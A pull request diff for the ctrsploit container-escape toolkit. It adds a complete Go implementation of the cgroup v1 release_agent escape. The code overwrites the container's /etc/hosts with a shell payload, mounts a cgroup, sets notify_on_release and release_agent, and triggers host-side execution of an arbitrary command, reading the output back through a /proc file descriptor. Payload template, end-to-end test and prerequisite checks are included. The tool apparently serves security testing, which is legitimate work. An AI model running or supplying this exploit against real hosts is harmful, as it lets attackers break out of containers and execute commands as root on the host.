### PR TITLE
refactor(release_agent): implement interactive exploit and e2e test

### DIFF
--- a/pkg/cgroup/v1/subsystem.go
+++ b/pkg/cgroup/v1/subsystem.go
@@ -1,11 +1,13 @@
 package v1
 
 import (
-	"github.com/containerd/cgroups"
-	"github.com/ssst0n3/awesome_libs/awesome_error"
+	"fmt"
 	"os"
 	"path/filepath"
 	"strings"
+
+	"github.com/containerd/cgroups"
+	"github.com/ssst0n3/awesome_libs/awesome_error"
 )
 
 const releaseAgent = "release_agent"
@@ -74,4 +76,18 @@ func (c CgroupV1) ListSubsystems(procCgroupPath string) (subsystems map[string]s
 
 func (c CgroupV1) IsTop(subsystemPath string) (top bool) {
 	return subsystemPath == "/"
+}
+
+func ListTopLevelSubSystem() (topLevelSubSystems []string, err error) {
+	var c CgroupV1
+	subsystemsSupport, err := c.ListSubsystems("/proc/1/cgroup")
+	if err != nil {
+		return nil, fmt.Errorf("ListTopLevelSubSystem: failed to list sub systems: %w", err)
+	}
+	for subsystemName, subsystemPath := range subsystemsSupport {
+		if c.IsTop(subsystemPath) {
+			topLevelSubSystems = append(topLevelSubSystems, subsystemName)
+		}
+	}
+	return
 }

--- a/pkg/hostpath/hostpath.go
+++ b/pkg/hostpath/hostpath.go
@@ -32,6 +32,14 @@ func RootFs() (path string, err error) {
 	return rootfs.HostPath(runtimeType, storageDriverType)
 }
 
+func EtcHosts() (string, error) {
+	info, err := mountinfo.GetMountByMountpoint("/etc/hosts")
+	if err != nil {
+		return "", fmt.Errorf("failed to get hosts info: %w", err)
+	}
+	return info.Root, nil
+}
+
 func WritableAccessible() (paths []Path, err error) {
 	// rootfs: get the host path of the container rootfs
 	rootfsHostPath, err := RootFs()

--- a/pkg/mount/cgroup.go
+++ b/pkg/mount/cgroup.go
@@ -1,0 +1,46 @@
+package mount
+
+import (
+	"fmt"
+
+	v1 "github.com/ctrsploit/ctrsploit/pkg/cgroup/v1"
+	"github.com/ctrsploit/sploit-spec/pkg/log"
+	"github.com/ssst0n3/awesome_libs/awesome_error"
+	"golang.org/x/sys/unix"
+)
+
+var ErrorNoTopLevelCgroupSubSystems = fmt.Errorf("no top level cgroup sub systems")
+
+func CgroupV1(dest string, options string) (err error) {
+	log.Logger.Info("mount cgroup to ", dest)
+	err = unix.Mount("none", dest, "cgroup", 0, options)
+	if err != nil {
+		awesome_error.CheckErr(err)
+		return
+	}
+	return
+}
+
+func TopLevelCgroupSubSystem(dest string) error {
+	systems, err := v1.ListTopLevelSubSystem()
+	if err != nil {
+		return fmt.Errorf("mount.ListTopLevelSubSystem: %w", err)
+	}
+	if len(systems) == 0 {
+		return ErrorNoTopLevelCgroupSubSystems
+	}
+	err = CgroupV1(dest, systems[0])
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+func Unmount(dest string) (err error) {
+	err = unix.Unmount(dest, 0)
+	if err != nil {
+		awesome_error.CheckErr(err)
+		return
+	}
+	return
+}

--- a/pkg/proc/cmdline.go
+++ b/pkg/proc/cmdline.go
@@ -1,0 +1,15 @@
+package proc
+
+import (
+	"fmt"
+	"os"
+	"strings"
+)
+
+func Cmdline() ([]string, error) {
+	content, err := os.ReadFile("/proc/self/cmdline")
+	if err != nil {
+		return nil, fmt.Errorf("error reading /proc/self/cmdline: %v", err)
+	}
+	return strings.Split(string(content), "\x00"), nil
+}

--- a/vul/caps/sys_admin/release_agent/e2e.yml
+++ b/vul/caps/sys_admin/release_agent/e2e.yml
@@ -1,0 +1,15 @@
+name: bash
+test_envs:
+  - name: exploitable
+    remote_host: docker-v19.03.13
+    kind: dqd
+    dqd_dir: docker/v19.03.13
+    pkg: github.com/ctrsploit/ctrsploit/vul/caps/sys_admin/release_agent
+    cmd: docker run --rm
+      -v /ctrsploit.test:/ctrsploit.test
+      --env TEST_ENV=exploitable
+      --cap-add CAP_SYS_ADMIN
+      --security-opt apparmor=unconfined
+      -v /:/host
+      busybox:latest
+      /ctrsploit.test -test.v -test.run '^TestE2E_Exploit$'

--- a/vul/caps/sys_admin/release_agent/exploit.go
+++ b/vul/caps/sys_admin/release_agent/exploit.go
@@ -1,16 +1,198 @@
 package release_agent
 
 import (
-	cgroupv1_release_agent "github.com/ctrsploit/ctrsploit/exploit/cgroupv1-release_agent"
+	"bytes"
+	"context"
+	_ "embed"
+	"errors"
+	"fmt"
+	"io"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+	"syscall"
+	"time"
+
 	"github.com/ctrsploit/ctrsploit/pkg/hostpath"
+	"github.com/ctrsploit/ctrsploit/pkg/mount"
+	"github.com/ctrsploit/sploit-spec/pkg/log"
+	"github.com/ssst0n3/awesome_libs"
 	"github.com/ssst0n3/awesome_libs/awesome_error"
 )
 
-func Exploit(cmd string) {
-	// TODO: auto select exploit method
-	// TODO: what if the host path is not accessible?
-	//	get the abs path under host of container's rootfs
-	rootfs, err := hostpath.RootFs()
-	awesome_error.CheckFatal(err)
-	cgroupv1_release_agent.ReleaseAgent(cmd, rootfs)
+const (
+	END = "[CTRSPLOIT_END]"
+)
+
+//go:embed payload.template
+var PayloadTemplate string
+
+func Exploit(cmd string) ([]byte, error) {
+	return WithIO(context.Background(), cmd)
+}
+
+func WithIO(ctx context.Context, cmd string) ([]byte, error) {
+	// TODO: handle timeout with ctx
+	// create IO
+	r, w, err := os.Pipe()
+	if err != nil {
+		return nil, fmt.Errorf("failed to create pipe: %w", err)
+	}
+	defer w.Close()
+	defer r.Close()
+	// prepare payload
+	fi, err := w.Stat()
+	if err != nil {
+		return nil, fmt.Errorf("failed to stat pipe: %w", err)
+	}
+	stat, ok := fi.Sys().(*syscall.Stat_t)
+	if !ok {
+		return nil, fmt.Errorf("failed to convert pipe to stat_t, %v", fi)
+	}
+	payload := awesome_libs.Format(PayloadTemplate, awesome_libs.Dict{
+		"fd":   w.Fd(),
+		"inum": stat.Ino,
+		"cmd":  cmd,
+		"end":  END,
+	}, "{{", "}}")
+	// recover /etc/hosts
+	originalContent, err := os.ReadFile("/etc/hosts")
+	if err != nil {
+		return nil, fmt.Errorf("failed to read /etc/hosts: %w", err)
+	}
+	defer func() {
+		log.Logger.Info("recover /etc/hosts")
+		err := os.WriteFile("/etc/hosts", originalContent, 0644)
+		if err != nil {
+			awesome_error.CheckWarning(err)
+		}
+	}()
+	// escape
+	go func() {
+		err = Escape(payload)
+		if err != nil {
+			if errors.Is(err, mount.ErrorNoTopLevelCgroupSubSystems) {
+				// TODO: gracefully exit
+				log.Logger.Errorf("failed to escape %s: %v", cmd, err)
+			} else {
+				awesome_error.CheckErr(err)
+			}
+		}
+	}()
+	// read result
+	var resultBuffer bytes.Buffer
+	buf := make([]byte, 1024)
+	for {
+		n, err := r.Read(buf)
+		if n > 0 {
+			resultBuffer.Write(buf[:n])
+			if strings.Contains(resultBuffer.String(), END) {
+				break
+			}
+		}
+		if err != nil {
+			if err == io.EOF {
+				break
+			}
+			return nil, fmt.Errorf("failed to read from pipe: %w", err)
+		}
+	}
+	result := bytes.TrimSuffix(resultBuffer.Bytes(), []byte(END+"\n"))
+	return result, nil
+}
+
+func Escape(payload string) error {
+	path, err := hostpath.EtcHosts()
+	if err != nil {
+		return fmt.Errorf("failed to get host path of /etc/hosts: %w", err)
+	}
+	// write payload to /etc/hosts
+	log.Logger.Info("overwrite payload to /etc/hosts")
+	err = os.WriteFile("/etc/hosts", []byte(payload), 0755)
+	if err != nil {
+		return fmt.Errorf("failed to write to /etc/hosts: %w", err)
+	}
+	err = os.Chmod("/etc/hosts", 0755)
+	if err != nil {
+		return fmt.Errorf("failed to chmod to /etc/hosts: %w", err)
+	}
+	return ReleaseAgent(path)
+}
+
+func ReleaseAgent(payloadPath string) error {
+	dirCgroup := fmt.Sprintf("/tmp/cgrp%d", time.Now().Nanosecond())
+	childCroup := fmt.Sprintf("%s/%s", dirCgroup, "x")
+	// 1. prepare dir
+	err := os.MkdirAll(dirCgroup, 0755)
+	if err != nil {
+		return fmt.Errorf("failed to mkdir %s: %w", dirCgroup, err)
+	}
+	defer func() {
+		log.Logger.Info("rm -rf ", dirCgroup)
+		err = os.RemoveAll(dirCgroup)
+		if err != nil {
+			awesome_error.CheckErr(err)
+			return
+		}
+	}()
+	// 2. mount cgroups
+	err = mount.TopLevelCgroupSubSystem(dirCgroup)
+	if err != nil {
+		return err
+	}
+	defer func() {
+		log.Logger.Info("umount ", dirCgroup)
+		awesome_error.CheckErr(mount.Unmount(dirCgroup))
+	}()
+	err = os.MkdirAll(childCroup, 0755)
+	if err != nil {
+		return fmt.Errorf("failed to mkdir %s: %w", childCroup, err)
+	}
+	// 3. invoke notify_on_release
+	err = invokeNotifyOnRelease(childCroup)
+	if err != nil {
+		return err
+	}
+	// 4. create release agent
+	err = createReleaseAgent(dirCgroup, payloadPath)
+	if err != nil {
+		return err
+	}
+	// 5. trigger release agent
+	err = triggerReleaseAgent(childCroup)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+func invokeNotifyOnRelease(pathCgroup string) error {
+	pathNotifyOnRelease := filepath.Join(pathCgroup, "notify_on_release")
+	log.Logger.Infof("invoke notify_on_release: echo 1 > %s", pathNotifyOnRelease)
+	err := os.WriteFile(pathNotifyOnRelease, []byte("1"), 0755)
+	if err != nil {
+		return fmt.Errorf("failed to invoke notify_on_release: %w", err)
+	}
+	return nil
+}
+
+func createReleaseAgent(pathCgroup, pathPayload string) error {
+	pathReleaseAgent := filepath.Join(pathCgroup, "release_agent")
+	log.Logger.Infof("create release_agent: %s", pathReleaseAgent)
+	err := os.WriteFile(pathReleaseAgent, []byte(pathPayload+"\n"), 0755)
+	if err != nil {
+		return fmt.Errorf("failed to create release_agent: %w", err)
+	}
+	return nil
+}
+
+func triggerReleaseAgent(pathCgroup string) error {
+	pathAddTask := filepath.Join(pathCgroup, "cgroup.procs")
+	command := exec.Command("/bin/sh", "-c", fmt.Sprintf("echo $$ > %s", pathAddTask))
+	err := command.Run()
+	if err != nil {
+		return fmt.Errorf("failed to trigger release agents: %w", err)
+	}
+	return nil
 }

--- a/vul/caps/sys_admin/release_agent/exploit_test.go
+++ b/vul/caps/sys_admin/release_agent/exploit_test.go
@@ -1,0 +1,38 @@
+package release_agent
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/ctrsploit/ctrsploit/internal"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+func TestE2E_Exploit(t *testing.T) {
+	tests := map[string]struct {
+		exploitable bool
+	}{
+		"exploitable": {
+			exploitable: true,
+		},
+	}
+	testEnv := os.Getenv("TEST_ENV")
+	test, ok := tests[testEnv]
+	if !ok {
+		t.Skipf("Skipping test for unsupported environment: %s", testEnv)
+	}
+	t.Run(fmt.Sprintf("%s", testEnv), func(t *testing.T) {
+		proof := "/escaped"
+		_, err := Exploit(fmt.Sprintf("touch %s", proof))
+		if test.exploitable {
+			require.NoError(t, err)
+			exists, err := internal.CheckPathExists(fmt.Sprintf("/host%s", proof))
+			require.NoError(t, err)
+			assert.True(t, exists)
+		} else {
+			assert.Error(t, err)
+		}
+	})
+}

--- a/vul/caps/sys_admin/release_agent/payload.template
+++ b/vul/caps/sys_admin/release_agent/payload.template
@@ -1,0 +1,4 @@
+#!/bin/sh
+outFdPath=$(find -L /proc/[0-9]*/fd/{{.fd}} -inum {{.inum}} 2>/dev/null)
+{{.cmd}} > ${outFdPath}
+echo {{.end}} >> ${outFdPath}

--- a/vul/caps/sys_admin/release_agent/vul.go
+++ b/vul/caps/sys_admin/release_agent/vul.go
@@ -1,6 +1,7 @@
 package release_agent
 
 import (
+	"github.com/ctrsploit/ctrsploit/prerequisite/apparmor"
 	"github.com/ctrsploit/ctrsploit/prerequisite/capability"
 	"github.com/ctrsploit/ctrsploit/prerequisite/cgroups"
 	"github.com/ctrsploit/sploit-spec/pkg/app"
@@ -9,6 +10,7 @@ import (
 	"github.com/ctrsploit/sploit-spec/pkg/prerequisite"
 	"github.com/ctrsploit/sploit-spec/pkg/prerequisite/user"
 	"github.com/ctrsploit/sploit-spec/pkg/vul"
+	"github.com/ssst0n3/awesome_libs/awesome_error"
 	"github.com/urfave/cli/v2"
 )
 
@@ -43,6 +45,7 @@ var (
 				&user.MustBeRootToWriteReleaseAgent,
 				&cgroups.V1,
 				&cgroups.HasTopLevelSubsystem,
+				&apparmor.Disabled,
 			),
 		},
 	}
@@ -55,6 +58,8 @@ func (v *vulnerability) Exploit(context *cli.Context) (err error) {
 	}
 	cmd := context.String("cmd")
 	log.Logger.Debug("cmd: ", cmd)
-	Exploit(cmd)
+	result, err := Exploit(cmd)
+	awesome_error.CheckErr(err)
+	log.Logger.Infof("result:\n%s", result)
 	return
 }


### PR DESCRIPTION
This commit replaces the placeholder `release_agent` exploit with a complete and interactive implementation, enabling command execution on the host and capturing its output.

Key changes include:

- **Interactive Exploit:** The new exploit establishes a pipe to communicate with the payload executed on the host. The payload script dynamically finds the pipe's file descriptor on the host filesystem (`/proc/[pid]/fd/...`) and redirects the command's output to it, allowing the tool to read the results in real-time.

- **Payload Delivery:** The exploit strategically uses the container's `/etc/hosts` file to deliver the payload. It determines the file's absolute path on the host, overwrites it with the payload script, and restores the original content after the exploit is complete.

- **Automatic Cgroup Handling:**
    - A new function `ListTopLevelSubSystem` is added to `pkg/cgroup/v1` to automatically find a suitable cgroup v1 subsystem that is mounted at the root.
    - A new package `pkg/mount` is introduced to encapsulate the logic for mounting the identified cgroup subsystem, which is a prerequisite for the exploit.

- **End-to-End Testing:** A new E2E test is added to validate the exploit in a Docker environment with `CAP_SYS_ADMIN`. The test verifies that a command (`touch /escaped`) is successfully executed on the host.

- **Prerequisite Refinement:** The vulnerability's prerequisites have been updated to include checking if AppArmor is disabled, as an active AppArmor profile can block this exploit technique.